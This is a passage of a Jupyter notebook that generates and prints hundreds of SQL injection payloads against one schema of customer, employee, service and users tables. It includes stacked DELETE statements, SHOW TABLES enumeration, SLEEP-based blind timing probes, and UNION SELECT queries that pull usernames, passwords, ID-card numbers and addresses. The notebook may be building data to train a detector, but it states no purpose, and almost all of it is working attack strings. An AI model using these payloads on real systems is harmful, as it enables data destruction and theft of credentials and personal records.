 '"; DELETE FROM customer WHERE tel = 0182524623#',
 '"; DELETE FROM customer WHERE lname = "DLpqPNPj"-- ',
 '"; DELETE FROM customer WHERE lname = "sSmRgLwCT"# ',
 '"; DELETE FROM employee WHERE nickname = "AAYZEd"#',
 '"; DELETE FROM service WHERE price = 709#',
 '"; DELETE FROM service WHERE name = "bonv"-- ',
 '"; DELETE FROM customer WHERE lname = "icdLOAzthG"# ',
 '"; DELETE FROM service WHERE name = "ZPpU"-- ',
 '"; DELETE FROM users WHERE username = "gycjjN"-- ',
 '"; DELETE FROM employee WHERE fname = "xLUx"#',
 '"; DELETE FROM customer WHERE email = "DxGbe"-- ',
 '"; DELETE FROM service WHERE name = "OnmGDlU"# ',
 '"; DELETE FROM employee WHERE nickname = "tEtkBxifczP"#',
 '"; DELETE FROM service WHERE price = 652# ',
 '"; DELETE FROM users WHERE password = "VFnkCPaA"#',
 '"; DELETE FROM service WHERE price = 974#',
 '"; DELETE FROM users WHERE username = "XHOfSkg"#',
 '"; DELETE FROM users WHERE password = "wJZiqu1ham"#',
 '"; DELETE FROM service WHERE price = 684# ',
 '"; DELETE FROM customer WHERE tel = 0905745029# ',
 '"; DELETE FROM service WHERE name = "NpeOWKuYmZaTtcN"-- ',
 '"; DELETE FROM service WHERE price = 194# ',
 '"; DELETE FROM service WHERE price = 492# ',
 '"; DELETE FROM service WHERE name = "pRnH"#',
 '"; DELETE FROM service WHERE price = 742-- ',
 '"; DELETE FROM customer WHERE tel = 0949357606-- ',
 '"; DELETE FROM service WHERE price = 008#',
 '"; DELETE FROM service WHERE price = 453-- ',
 '"; DELETE FROM employee WHERE work_background = "nBenx4seYeJXz"-- ',
 '"; DELETE FROM users WHERE password = "63kq9JNXy"-- ',
 '"; DELETE FROM customer WHERE fname = "nUgYcBiZos"# ',
 '"; DELETE FROM service WHERE name = "WojRckti"# ',
 '"; DELETE FROM service WHERE name = "KrAHpkf"# ',
 '"; DELETE FROM employee WHERE lname = "ZbZAxnxFfA"-- ',
 '"; DELETE FROM users WHERE username = "QiWIFnbGMyS"-- ',
 '"; DELETE FROM users WHERE username = "OLSmErhuydorxB"#',
 '"; DELETE FROM users WHERE username = "PMySHZzWbpROj"-- ',
 '"; DELETE FROM service WHERE price = 966-- ',
 '"; DELETE FROM service WHERE price = 956# ',
 '"; DELETE FROM users WHERE username = "nmGkgL"# ',
 '"; DELETE FROM users WHERE password = "3BqbheJMhlZ"-- ',
 '"; DELETE FROM service WHERE price = 285# ',
 '"; DELETE FROM service WHERE name = "NHGhjFTyCpMgnvh"# ',
 '"; DELETE FROM users WHERE username = "NIXxjKzZK"#',
 '"; DELETE FROM users WHERE password = "wPpFVNf"# ',
 '"; DELETE FROM service WHERE price = 984# ',
 '"; DELETE FROM employee WHERE work_background = "dC28jKO"-- ',
 '"; DELETE FROM service WHERE price = 251# ',
 '"; DELETE FROM employee WHERE graduation_certificate = "0Bjay"# ',
 '"; DELETE FROM customer WHERE lname = "NBfLKsscT"-- ',
 '"; DELETE FROM users WHERE password = "9dOZmwYAqSUIC"# ',
 '"; DELETE FROM employee WHERE tel = 0519703436#',
 '"; DELETE FROM customer WHERE tel = 0495850256# ',
 '"; DELETE FROM customer WHERE lname = "rVljUhWfzjaNlR"-- ',
 '"; DELETE FROM employee WHERE nickname = "DLtf"# ',
 '"; DELETE FROM service WHERE name = "qtavXRth"#',
 '"; DELETE FROM customer WHERE fname = "IfNOIr"-- ',
 '"; DELETE FROM employee WHERE prefixname = "qiYHMKlq"# ',
 '"; DELETE FROM employee WHERE lname = "OsJiErqgXWBPY"#',
 '"; DELETE FROM users WHERE password = "Tvi6MeaYf3m"-- ',
 '"; DELETE FROM customer WHERE customer_id = "2X0wA6"#',
 '"; DELETE FROM service WHERE name = "qOutKgzc"-- ',
 '"; DELETE FROM employee WHERE email = "z0AnQ"#',
 '"; DELETE FROM service WHERE name = "zDfDNQ"#',
 '"; DELETE FROM users WHERE password = "jTG5M9xwd256y"#',
 '"; DELETE FROM employee WHERE id_card = 1572033432153#',
 '"; DELETE FROM users WHERE username = "nhMyZOKkCWR"#',
 '"; DELETE FROM employee WHERE nickname = "mhuZgnfdoZHo"-- ',
 '"; DELETE FROM employee WHERE work_background = "YmE4CdgDP2cR"# ',
 '"; DELETE FROM employee WHERE tel = 0826824095# ',
 '"; DELETE FROM service WHERE price = 549-- ',
 '"; DELETE FROM service WHERE name = "RobNjOCMDaYn"# ',
 '"; DELETE FROM service WHERE name = "jHuerCVW"-- ',
 '"; DELETE FROM customer WHERE fname = "CtLYMC"#',
 '"; DELETE FROM service WHERE price = 845# ',
 '"; DELETE FROM users WHERE password = "DJSyUc"#',
 '"; DELETE FROM customer WHERE tel = 0237288795#',
 '"; DELETE FROM employee WHERE tel = 0434709966-- ',
 '"; DELETE FROM users WHERE password = "sVnrSdblE5"-- ',
 '"; DELETE FROM users WHERE username = "QrudoisFq"# ',
 '"; DELETE FROM service WHERE price = 603-- ',
 '"; DELETE FROM employee WHERE employee_id = "mTO5tS4"#',
 '"; DELETE FROM customer WHERE fname = "uHZCtq"-- ',
 '"; DELETE FROM users WHERE username = "oMlt"# ',
 '"; DELETE FROM users WHERE password = "rS5se9b6UlNf3G6"-- ',
 '"; DELETE FROM employee WHERE lname = "gKDAYl"-- ',
 '"; DELETE FROM employee WHERE email = "SzzXDd7VMjs1O"#',
 '"; DELETE FROM service WHERE price = 316#',
 '"; DELETE FROM users WHERE password = "oSH3FVEfYTA"-- ',
 '"; DELETE FROM customer WHERE customer_id = "E53ZPEOYRXJ"-- ',
 '"; DELETE FROM employee WHERE employee_id = "erGrv0TZYRYq"# ',
 '"; DELETE FROM employee WHERE house_registration = "1NZQT4SzGZGuG"#',
 '"; DELETE FROM service WHERE name = "IcrcbpH"# ',
 '"; DELETE FROM customer WHERE email = "vbLYX3HBg"#',
 '"; DELETE FROM users WHERE password = "Eq5O26IPtVlsu3"#',
 '"; DELETE FROM employee WHERE employee_id = "gt4js7SANUwii2p"# ',
 '"; DELETE FROM service WHERE name = "MVuDs"# ',
 '"; DELETE FROM service WHERE price = 661-- ',
 '"; DELETE FROM service WHERE price = 179#',
 '"; DELETE FROM service WHERE name = "qyIOtRQvVwY"# ',
 '"; DELETE FROM customer WHERE lname = "uPusbgJX"#',
 '"; DELETE FROM employee WHERE id_card = 1554658883125# ',
 '"; DELETE FROM users WHERE password = "6ukqa0rsSKTCp"# ',
 '"; DELETE FROM users WHERE password = "1KZ8"-- ',
 '"; DELETE FROM customer WHERE tel = 0885908843#',
 '"; DELETE FROM customer WHERE lname = "LMcxaBnFm"# ',
 '"; DELETE FROM users WHERE username = "LoBndaHtjJT"#',
 '"; DELETE FROM employee WHERE lname = "EBobqY"# ',
 '"; DELETE FROM users WHERE username = "jrFjwHj"#',
 '"; DELETE FROM users WHERE username = "plUVCjQpVnR"# ',
 '"; DELETE FROM users WHERE username = "hqBTvNLBM"# ',
 '"; DELETE FROM service WHERE price = 860#']

In [21]:
def randomShowForSearch(showList, last):
    gen=[]
    for i in range(100) :
        preStr =""
        random_show=showList[random.randint(0, len(showList)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r"\"; " + "SHOW " + random_show + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [22]:
randomShowForSearch(showList, last)

['\\"; SHOW TABLES-- ',
 '\\"; SHOW DATABASES#',
 '\\"; SHOW COLUME-- ',
 '\\"; SHOW TABLES#',
 '\\"; SHOW TABLES# ',
 '\\"; SHOW DATABASES-- ',
 '\\"; SHOW DATABASES# ',
 '\\"; SHOW COLUME# ',
 '\\"; SHOW COLUME#']

In [23]:
def randomWaitForSearch(showList, last):
    gen=[]
    for i in range(20) :
        preStr =""
        time = random.randint(1, 15)
        preStr += r'\"; ' + "SELECT SLEEP(" + str(time) + ")"
        random_last=last[random.randint(0, len(last)-1)]
        preStr += random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [24]:
randomWaitForSearch(showList, last)

['\\"; SELECT SLEEP(1)-- ',
 '\\"; SELECT SLEEP(15)# ',
 '\\"; SELECT SLEEP(7)-- ',
 '\\"; SELECT SLEEP(5)#',
 '\\"; SELECT SLEEP(7)# ',
 '\\"; SELECT SLEEP(14)# ',
 '\\"; SELECT SLEEP(6)-- ',
 '\\"; SELECT SLEEP(11)-- ',
 '\\"; SELECT SLEEP(3)-- ',
 '\\"; SELECT SLEEP(4)-- ',
 '\\"; SELECT SLEEP(12)#',
 '\\"; SELECT SLEEP(6)# ',
 '\\"; SELECT SLEEP(15)#',
 '\\"; SELECT SLEEP(2)#']

In [25]:
def randomWaitUnionForSearch(showList, last):
    gen=[]
    for i in range(30) :
        preStr =""
        time = random.randint(1, 15)
        preStr += r'\" UNION SELECT SLEEP(' + str(time) + ")"
        numOfParam = random.randint(0, 7)
        for j in range(numOfParam):
            preStr += ',' + str(random.randint(1, 9))
        random_last=last[random.randint(0, len(last)-1)]
        preStr += random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [26]:
randomWaitUnionForSearch(showList, last)

['\\" UNION SELECT SLEEP(8)#',
 '\\" UNION SELECT SLEEP(3),4,3,4-- ',
 '\\" UNION SELECT SLEEP(12),4,7,8#',
 '\\" UNION SELECT SLEEP(11),3,6,1-- ',
 '\\" UNION SELECT SLEEP(2),7,4,6# ',
 '\\" UNION SELECT SLEEP(2),3,4,9-- ',
 '\\" UNION SELECT SLEEP(2)# ',
 '\\" UNION SELECT SLEEP(8),5,6,8,1,9,3,3# ',
 '\\" UNION SELECT SLEEP(6),4,1,2,1,2,3#',
 '\\" UNION SELECT SLEEP(13),2,6,1# ',
 '\\" UNION SELECT SLEEP(7),1,9,6,2,4,1#',
 '\\" UNION SELECT SLEEP(5),9,5,3,3,8,1,4# ',
 '\\" UNION SELECT SLEEP(10),7# ',
 '\\" UNION SELECT SLEEP(10),1,8,4,9-- ',
 '\\" UNION SELECT SLEEP(9),9,6,1,5,9,5#',
 '\\" UNION SELECT SLEEP(6),9,2,3,3,1# ',
 '\\" UNION SELECT SLEEP(12)#',
 '\\" UNION SELECT SLEEP(7),6,4,2,6,9# ',
 '\\" UNION SELECT SLEEP(11),9,3,1,7,9,3#',
 '\\" UNION SELECT SLEEP(15),7,7# ',
 '\\" UNION SELECT SLEEP(15),8,6,7,1,6,3,5-- ',
 '\\" UNION SELECT SLEEP(14),8,6,5,4,1# ',
 '\\" UNION SELECT SLEEP(1)-- ',
 '\\" UNION SELECT SLEEP(4),8,6,8,1,8#',
 '\\" UNION SELECT SLEEP(15),6-- ',
 '\\" UNION SELECT SLEEP(10),3,7,1,2#',
 '\\" UNION SELECT SLEEP(2),7# ',
 '\\" UNION SELECT SLEEP(14),8,5,1,4#']

In [27]:
def randomUnionForUrl(table, table_value, last):
    gen=[]
    for i in range(100) :
        typeOfValue=[]
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";'+" UNION SELECT "
        
        numOfParam=random.randint(0, len(table_value[random_table])-1)
        if (numOfParam == 0):
            preStr += "*" + " FROM " + random_table + "" + random_last
        else:
            for j in range(numOfParam) :
                while True:
                    random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                    if random_table_value not in preStr:
                        typeOfValue.append(type_of_value[random_table_value])
                        break
                    continue 
                    
                preStr += random_table_value
                if j != numOfParam-1 :
                    preStr += ", "
            preStr += " FROM " + random_table
            preStr += "" + random_last

            if preStr in gen:
                continue
            else:
                gen.append(preStr)
    return gen

In [28]:
randomUnionForUrl(table, table_value, last)

['\\"; UNION SELECT name FROM service# ',
 '\\"; UNION SELECT price FROM service-- ',
 '\\"; UNION SELECT tel, house_registration, lname, employee_id, prefixname, address FROM employee-- ',
 '\\"; UNION SELECT lname, work_background, fname FROM employee# ',
 '\\"; UNION SELECT fname FROM customer-- ',
 '\\"; UNION SELECT nickname, lname, work_background, fname, employee_id, id_card FROM employee-- ',
 '\\"; UNION SELECT password FROM users# ',
 '\\"; UNION SELECT employee_id, prefixname, lname, id_card, tel, graduation_certificate, work_background, house_registration, address, email, fname FROM employee# ',
 '\\"; UNION SELECT password FROM users-- ',
 '\\"; UNION SELECT prefixname, nickname, employee_id, tel, id_card, address, house_registration, lname, graduation_certificate, work_background, fname FROM employee# ',
 '\\"; UNION SELECT password FROM users#',
 '\\"; UNION SELECT email, prefixname, employee_id, work_background, address, tel, id_card, house_registration FROM employee# ',
 '\\"; UNION SELECT username FROM users-- ',
 '\\"; UNION SELECT house_registration, tel, address, prefixname, nickname, id_card, graduation_certificate, work_background, fname, employee_id FROM employee# ',
 '\\"; UNION SELECT house_registration, tel, id_card, address, fname FROM employee# ',
 '\\"; UNION SELECT lname FROM customer#',
 '\\"; UNION SELECT id_card FROM employee# ',
 '\\"; UNION SELECT price FROM service#',
 '\\"; UNION SELECT username FROM users#',
 '\\"; UNION SELECT graduation_certificate, work_background, employee_id, id_card, prefixname, fname, email, lname FROM employee# ',
 '\\"; UNION SELECT tel, address, email, graduation_certificate, lname, nickname, employee_id FROM employee-- ',
 '\\"; UNION SELECT lname, employee_id, id_card, prefixname, house_registration, nickname, fname, work_background, address, email FROM employee-- ',
 '\\"; UNION SELECT username FROM users# ',
 '\\"; UNION SELECT customer_id, email FROM customer# ',
 '\\"; UNION SELECT employee_id, fname, work_background FROM employee# ',
 '\\"; UNION SELECT fname FROM customer#',
 '\\"; UNION SELECT graduation_certificate, fname, lname, id_card, work_background FROM employee# ',
 '\\"; UNION SELECT fname, prefixname, employee_id, tel, graduation_certificate FROM employee-- ',
 '\\"; UNION SELECT customer_id, fname FROM customer# ',
 '\\"; UNION SELECT email, house_registration, prefixname, employee_id, address, graduation_certificate FROM employee#',
 '\\"; UNION SELECT customer_id FROM customer-- ',
 '\\"; UNION SELECT nickname, id_card, prefixname FROM employee# ',
 '\\"; UNION SELECT id_card, tel, email, fname, lname, house_registration, prefixname FROM employee# ',
 '\\"; UNION SELECT tel, customer_id, email, fname FROM customer-- ',
 '\\"; UNION SELECT address, graduation_certificate, tel, house_registration, id_card, nickname FROM employee#',
 '\\"; UNION SELECT id_card, graduation_certificate FROM employee# ',
 '\\"; UNION SELECT email FROM customer-- ',
 '\\"; UNION SELECT lname, tel, fname FROM customer#',
 '\\"; UNION SELECT email, lname, customer_id FROM customer-- ',
 '\\"; UNION SELECT house_registration FROM employee-- ',
 '\\"; UNION SELECT fname, lname FROM customer#',
 '\\"; UNION SELECT customer_id FROM customer#',
 '\\"; UNION SELECT lname, nickname, tel, employee_id FROM employee-- ',
 '\\"; UNION SELECT email, work_background, fname, prefixname, house_registration, employee_id, graduation_certificate, id_card, tel, address, lname FROM employee# ',
 '\\"; UNION SELECT lname, fname, work_background, email, id_card FROM employee# ',
 '\\"; UNION SELECT lname FROM customer# ',
 '\\"; UNION SELECT tel, email, fname FROM customer# ',
 '\\"; UNION SELECT price FROM service# ',
 '\\"; UNION SELECT email, customer_id, fname FROM customer#',
 '\\"; UNION SELECT work_background FROM employee#',
 '\\"; UNION SELECT lname, fname, customer_id, tel FROM customer-- ',
 '\\"; UNION SELECT house_registration, employee_id, fname, work_background, lname, email, graduation_certificate FROM employee-- ',
 '\\"; UNION SELECT email, lname, tel, employee_id, fname, id_card, work_background, nickname FROM employee# ',
 '\\"; UNION SELECT tel, lname FROM customer#']

In [29]:
def randomUnionForBlind(table, table_value, last):
    gen=[]
    for i in range(100) :
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\";'+" UNION SELECT "
        
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :   
            preStr += "1"
            if j != numOfParam-1 :
                preStr += ", "
        preStr += " FROM " + random_table
        preStr += "" + random_last

        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [30]:
randomUnionForBlind(table, table_value, last)

['\\"; UNION SELECT 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1 FROM customer-- ',
 '\\"; UNION SELECT 1 FROM service# ',
 '\\"; UNION SELECT 1, 1 FROM customer# ',
 '\\"; UNION SELECT 1 FROM users-- ',
 '\\"; UNION SELECT 1 FROM users#',
 '\\"; UNION SELECT 1 FROM service#',
 '\\"; UNION SELECT 1 FROM service-- ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1 FROM users# ',
 '\\"; UNION SELECT 1 FROM employee#',
 '\\"; UNION SELECT 1, 1 FROM customer#',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1 FROM employee#',
 '\\"; UNION SELECT 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1, 1 FROM customer#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1 FROM customer#',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1, 1 FROM customer# ',
 '\\"; UNION SELECT 1 FROM customer# ',
 '\\"; UNION SELECT 1, 1 FROM employee# ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM customer#',
 '\\"; UNION SELECT 1, 1, 1 FROM employee-- ',
 '\\"; UNION SELECT 1, 1, 1, 1 FROM customer-- ',
 '\\"; UNION SELECT 1, 1, 1 FROM customer-- ',
 '\\"; UNION SELECT 1, 1, 1, 1, 1, 1 FROM employee#',
 '\\"; UNION SELECT 1, 1, 1 FROM employee# ']